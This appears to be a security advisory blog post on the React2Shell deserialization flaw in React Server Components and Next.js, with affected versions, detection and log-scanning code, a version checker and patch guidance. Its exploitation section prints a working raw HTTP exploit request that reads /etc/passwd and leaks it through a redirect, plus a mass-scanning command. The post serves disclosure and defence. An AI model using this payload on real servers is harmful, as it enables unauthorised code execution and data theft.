React2Shell: A Critical Vulnerability in Modern Frontend Frameworks

Securify

What is React2Shell (CVE-2025-55182)?

A critical vulnerability, rated CVSS 10.0 and nicknamed React2Shell, has been discovered in React’s Flight protocol. It could allow attackers to execute arbitrary code on servers running React Server Components. CVE-2025-55182 affects multiple popular frameworks, including Next.js, React Router, React Server Components, and Waku, and exploitation is possible under default configurations. Successful exploitation gives an attacker remote code execution (effectively command injection) on the frontend server, and with it complete control over the server, its code and its configuration.

Technical details of the React2Shell vulnerability

CVE-2025-55182 is an unsafe deserialization vulnerability in React’s Flight protocol, affecting server component payloads. It is a logical deserialization flaw: the server processes RSC payloads unsafely.

When a server receives a specially crafted, malformed HTTP payload (typically delivered in the body of a POST request), it fails to correctly validate the structure of the data. Because of this insecure deserialization, attacker-controlled data can influence server-side execution logic. Attackers can therefore craft malicious payloads that, when processed by the server, lead to unauthenticated remote code execution. Exploitation is possible under the default configuration of several popular frameworks, which makes the vulnerability critical and widely exploitable.

Which React and Next.js versions are vulnerable?

The following packages are vulnerable to CVE-2025-55182 because they implement parts of React’s Flight protocol, which handles server component payloads and is the source of the unsafe deserialization flaw:

Package                           Affected versions
--------------------------------  --------------------------------
react-server-dom-parcel (npm)     19.0, 19.1.0, 19.1.1, 19.2.0
react-server-dom-turbopack (npm)  19.0, 19.1.0, 19.1.1, 19.2.0
react-server-dom-webpack (npm)    19.0, 19.1.0, 19.1.1, 19.2.0
next (npm)                        >= 14.3.0-canary.77, < 15.0.5
                                  >= 15.1.0-canary.0, < 15.1.9
                                  >= 15.2.0-canary.0, < 15.2.6
                                  >= 15.3.0-canary.0, < 15.3.6
                                  >= 15.4.0-canary.0, < 15.4.8
                                  >= 15.5.0-canary.0, < 15.5.7
                                  >= 16.0.0-canary.0, < 16.0.7

Detection & Exploitation

There are multiple public exploits available by now. The ActiveScan++ (v2.0.8) extension for Burp Suite Professional lets you quickly investigate React2Shell behaviour and validate specific endpoints.

If you are scanning a lot of targets, the quickest way is the Nuclei engine with the CVE-2025-55182 template:

cat targets.txt | nuclei -id CVE-2025-55182

Raw HTTP Request:

POST / HTTP/1.1
Host: target.com
User-Agent: Mozilla/5.0 (Ubuntu; Linux x86_64; rv:126.0) Gecko/20100101 Firefox/126.0
Connection: keep-alive
Content-Length: 718
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx8jO2oVc6SWP3Sad
Next-Action: x
X-Nextjs-Html-Request-Id: RmfltNIHJhLjoVdcwzrxi
X-Nextjs-Request-Id: j2ubmjrn
Accept-Encoding: gzip, deflate, br

------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="0"

{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B1337\"}","_response":{"_prefix":"var res=process.mainModule.require('child_process').execSync('cat /etc/passwd').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});","_chunks":"$Q2","_formData":{"get":"$1:constructor:constructor"}}}
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="1"

"$@0"
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="2"

[]
------WebKitFormBoundaryx8jO2oVc6SWP3Sad--

The root cause of this vulnerability lies in how React’s Flight protocol processes incoming data. The data is processed as chunks, as seen above, which can reference each other; the references are denoted by the $ symbols. The exploit takes advantage of this behaviour together with a bug caused by missing attribute checks, which allows access to properties such as constructor. The fix for the attribute check can be seen in the upstream patch.

The crafted payload chains internal gadgets to create a Promise-like object with an attacker-controlled “.then” property. During deserialization, these Promise-like objects are automatically resolved, which results in code execution.
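As an added illustration (not React’s code and not from the original post), here is a small reference resolver of the kind the root-cause paragraph implies: chunk references of the form $<id>:<key>:<key> are walked only across own properties of plain objects and arrays, and keys that step onto the prototype chain are rejected before anything is dereferenced. The chunk map is constructed for the example; the two rejected references are the ones that appear in the request above.

```javascript
// Added illustration, not React's implementation: resolve a "$<id>:<key>:<key>"
// chunk reference with the attribute check the post describes as missing.
// Only own properties of plain objects and arrays may be traversed, so keys that
// walk the prototype chain (__proto__, constructor, prototype) and inherited
// members such as Object.prototype.then/toString are never reachable.

const FORBIDDEN_KEYS = new Set(['__proto__', 'constructor', 'prototype']);

// Plain data containers only: arrays, null-prototype objects, object literals.
function isPlainContainer(value) {
  if (Array.isArray(value)) return true;
  if (value === null || typeof value !== 'object') return false;
  const proto = Object.getPrototypeOf(value);
  return proto === Object.prototype || proto === null;
}

// chunks: Map<string, unknown> of already-parsed chunk bodies keyed by id.
// ref:    reference string such as "$2:user:name".
// Returns { ok: true, value } on success, { ok: false, error } otherwise.
function resolveReference(chunks, ref) {
  if (typeof ref !== 'string' || !ref.startsWith('$')) {
    return { ok: false, error: 'not a reference' };
  }
  const [id, ...path] = ref.slice(1).split(':');
  if (!chunks.has(id)) return { ok: false, error: `unknown chunk ${id}` };

  let current = chunks.get(id);
  for (const key of path) {
    if (FORBIDDEN_KEYS.has(key)) {
      return { ok: false, error: `forbidden key ${key}` };
    }
    if (!isPlainContainer(current) || !Object.hasOwn(current, key)) {
      return { ok: false, error: `no own property ${key}` };
    }
    current = current[key];
  }
  return { ok: true, value: current };
}

// Constructed chunk table for the demonstration.
const SAMPLE_CHUNKS = new Map([
  ['1', { user: { name: 'alice' } }],
  ['2', [10, 20]],
]);

for (const ref of ['$1:user:name', '$2:1', '$1:__proto__:then', '$1:constructor:constructor', '$1:user:toString']) {
  console.log(ref, JSON.stringify(resolveReference(SAMPLE_CHUNKS, ref)));
}
```

The two checks are independent: the deny-list stops the obvious prototype keys, and the own-property test stops everything else that is inherited (a `then` or `toString` found on Object.prototype rather than on the chunk itself), so a reference can only ever yield data the server itself parsed.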

To detect exploitation activity, inspect incoming POST requests for the header that routes a request to a server action:

  • In Next.js apps, this header is next-action.
  • In other apps, it may be rsc-action-id.

Some public exploit PoCs also exfiltrate data using query parameters during redirects. In Next.js, these values appear in the x-action-redirect response header. 
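An added detection example, not from the original post: a scanner over a JSON-per-line access log that flags the server-action header and the query-bearing x-action-redirect responses described above. The log format, field names, client addresses and the 64-byte query threshold are assumptions made for the example; the sample lines are constructed.

```javascript
// Added example, not from the original post. Scans a JSON-per-line access log
// (constructed format: ts, client, method, path, request_headers, response_headers,
// status; header names lower-cased) for the two indicators the post names.

const ACTION_HEADERS = ['next-action', 'rsc-action-id'];
const LONG_QUERY_BYTES = 64; // assumed threshold for "query string carrying command output"

function classifyEntry(entry) {
  const req = entry.request_headers || {};
  const res = entry.response_headers || {};
  const reasons = [];
  let severity = null;

  // 1. A POST carrying the server-action header. Legitimate server actions look
  //    like this too, so on its own it is only correlation context.
  const actionHeader = ACTION_HEADERS.find((h) => h in req);
  if (actionHeader && entry.method === 'POST') {
    reasons.push(`server action invoked via ${actionHeader} header`);
    severity = 'info';
  }

  // 2. A redirect whose query string carries data: the exfiltration channel the
  //    post describes for public PoCs.
  const redirect = res['x-action-redirect'];
  if (typeof redirect === 'string' && redirect.includes('?')) {
    const query = redirect.slice(redirect.indexOf('?') + 1);
    if (query.length >= LONG_QUERY_BYTES) {
      reasons.push(`x-action-redirect carries ${query.length} bytes of query data`);
      severity = 'high';
    } else if (severity === 'info') {
      reasons.push('server action answered with a query-bearing redirect');
      severity = 'medium';
    }
  }

  if (severity === null) return null;
  return { ts: entry.ts, client: entry.client, path: entry.path, severity, reasons };
}

function scanLogLines(lines) {
  const findings = [];
  for (const line of lines) {
    if (!line.trim()) continue;
    let entry;
    try {
      entry = JSON.parse(line);
    } catch {
      continue; // malformed line: skip it rather than abort the scan
    }
    const finding = classifyEntry(entry);
    if (finding) findings.push(finding);
  }
  return findings;
}

// Constructed sample log: a plain GET, a legitimate-looking server action, a
// server action that redirected with a short query, a malformed line, and a
// server action whose redirect target carries a long query string.
const SAMPLE_LOG = [
  '{"ts":"2025-12-04T10:00:01Z","client":"203.0.113.5","method":"GET","path":"/","request_headers":{"user-agent":"curl/8.0"},"response_headers":{},"status":200}',
  '{"ts":"2025-12-04T10:00:02Z","client":"203.0.113.6","method":"POST","path":"/","request_headers":{"next-action":"7f3a","content-type":"multipart/form-data; boundary=x"},"response_headers":{},"status":200}',
  '{"ts":"2025-12-04T10:00:03Z","client":"203.0.113.6","method":"POST","path":"/","request_headers":{"next-action":"7f3a","content-type":"multipart/form-data; boundary=x"},"response_headers":{"x-action-redirect":"/dashboard?tab=1;push"},"status":303}',
  'not a json line',
  '{"ts":"2025-12-04T10:00:04Z","client":"198.51.100.9","method":"POST","path":"/","request_headers":{"next-action":"x","content-type":"multipart/form-data; boundary=y"},"response_headers":{"x-action-redirect":"/login?a=' + 'A'.repeat(80) + ';push"},"status":303}',
].join('\n');

for (const f of scanLogLines(SAMPLE_LOG.split('\n'))) {
  console.log(`${f.severity.toUpperCase()} ${f.ts} ${f.client} ${f.reasons.join('; ')}`);
}
```

The action header alone is deliberately kept at "info": every real server action carries it, so the signal comes from correlating it with an unusual redirect (or, if your proxy logs bodies, with $-references to constructor or __proto__ in the multipart form fields).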

Mitigating This Vulnerability

Customers must upgrade to the following patched versions to address the vulnerabilities:

  • react-server-dom-parcel 19.0.1, 19.1.2, 19.2.1
  • react-server-dom-turbopack 19.0.1, 19.1.2, 19.2.1
  • react-server-dom-webpack 19.0.1, 19.1.2, 19.2.1
  • Next.js releases 15.0.5, 15.1.9, 15.2.6, 15.3.6, 15.4.8, 15.5.7, 16.0.7
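An added helper, not the post’s or the React/Next.js projects’ own tooling: it checks package versions against the affected ranges and patched releases listed in this post, comparing canary pre-release identifiers the semver way. The sample inventory at the end is constructed, and the table entry "19.0" is read as 19.0.0.

```javascript
// Added example, not the post's or the React/Next.js projects' own tooling.
// Checks package versions against the affected ranges and patched releases
// listed in the post. Pre-release identifiers (canary builds) are compared the
// semver way: a pre-release sorts before its release, numeric parts numerically.

function parseVersion(text) {
  const m = /^(\d+)\.(\d+)\.(\d+)(?:-([0-9A-Za-z.-]+))?$/.exec(text.trim());
  if (!m) throw new Error(`unparseable version: ${text}`);
  const pre = m[4] ? m[4].split('.').map((p) => (/^\d+$/.test(p) ? Number(p) : p)) : null;
  return { major: Number(m[1]), minor: Number(m[2]), patch: Number(m[3]), pre };
}

function compareVersions(a, b) {
  for (const k of ['major', 'minor', 'patch']) {
    if (a[k] !== b[k]) return a[k] < b[k] ? -1 : 1;
  }
  if (a.pre === null && b.pre === null) return 0;
  if (a.pre === null) return 1;   // release > pre-release of the same core version
  if (b.pre === null) return -1;
  const n = Math.max(a.pre.length, b.pre.length);
  for (let i = 0; i < n; i++) {
    const x = a.pre[i], y = b.pre[i];
    if (x === undefined) return -1;  // shorter identifier list sorts first
    if (y === undefined) return 1;
    if (x === y) continue;
    if (typeof x === 'number' && typeof y === 'number') return x < y ? -1 : 1;
    if (typeof x === 'number') return -1; // numeric identifiers sort before alphanumeric
    if (typeof y === 'number') return 1;
    return x < y ? -1 : 1;
  }
  return 0;
}

// Data transcribed from the post's tables. "19.0" is read as 19.0.0.
const RSD_PACKAGES = new Set(['react-server-dom-parcel', 'react-server-dom-turbopack', 'react-server-dom-webpack']);
const RSD_AFFECTED = ['19.0.0', '19.1.0', '19.1.1', '19.2.0'];
const RSD_FIXED = { '19.0': '19.0.1', '19.1': '19.1.2', '19.2': '19.2.1' };

// [first affected version (inclusive), first patched version (exclusive)]
const NEXT_RANGES = [
  ['14.3.0-canary.77', '15.0.5'],
  ['15.1.0-canary.0', '15.1.9'],
  ['15.2.0-canary.0', '15.2.6'],
  ['15.3.0-canary.0', '15.3.6'],
  ['15.4.0-canary.0', '15.4.8'],
  ['15.5.0-canary.0', '15.5.7'],
  ['16.0.0-canary.0', '16.0.7'],
];

function assess(pkg, version) {
  const v = parseVersion(version);
  if (RSD_PACKAGES.has(pkg)) {
    const hit = RSD_AFFECTED.some((a) => compareVersions(v, parseVersion(a)) === 0);
    return { pkg, version, affected: hit, upgradeTo: hit ? RSD_FIXED[`${v.major}.${v.minor}`] : null };
  }
  if (pkg === 'next') {
    for (const [lo, hi] of NEXT_RANGES) {
      if (compareVersions(v, parseVersion(lo)) >= 0 && compareVersions(v, parseVersion(hi)) < 0) {
        return { pkg, version, affected: true, upgradeTo: hi };
      }
    }
    return { pkg, version, affected: false, upgradeTo: null };
  }
  return { pkg, version, affected: false, upgradeTo: null, note: 'not in the advisory table' };
}

// deps: { name: version } as read from a lockfile or `npm ls --json` output. Returns only hits.
function findAffected(deps) {
  return Object.entries(deps).map(([pkg, ver]) => assess(pkg, ver)).filter((r) => r.affected);
}

// Constructed inventory for the demonstration.
const SAMPLE_DEPS = { next: '15.3.2', 'react-server-dom-webpack': '19.1.1', react: '19.1.0' };
for (const r of findAffected(SAMPLE_DEPS)) {
  console.log(`${r.pkg}@${r.version} is affected; upgrade to ${r.upgradeTo}`);
}
```

The pre-release handling matters here because every Next.js range starts at a canary build: a naive string or three-number comparison would either miss 14.3.0-canary.77 or wrongly treat 15.0.5-canary.1 as already patched.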

A compensating control while you patch is a WAF. Multiple major WAFs, edge/CDN vendors and hosting platforms moved quickly to virtually patch and blunt React2Shell (CVE-2025-55182):

  • Cloudflare deployed automatic WAF rules and temporarily raised the WAF request-payload inspection window to 1 MB, and continues to tune rules and monitor exploit patterns.
  • Vercel pushed automated patching for managed projects, actively triaged reports, and invited responsible-disclosure/bug-bounty reports for WAF-bypass techniques.
  • AWS rolled rule updates into the AWS WAF managed rules and published guidance for custom rules.
  • Google Cloud Armor published and recommended a Cloud Armor rule to block exploit attempts.
  • Large CDN/WAF vendors (Akamai, Fastly, F5/HAProxy, Imperva etc.) published advisories and shipped virtual-patch rules or detection signatures, so proxied customers were protected while teams patched their runtimes.

A virtual patch only blocks the payload shapes it recognises; Vercel’s own call for WAF-bypass reports shows why it is a stopgap, so upgrade the runtime as well.
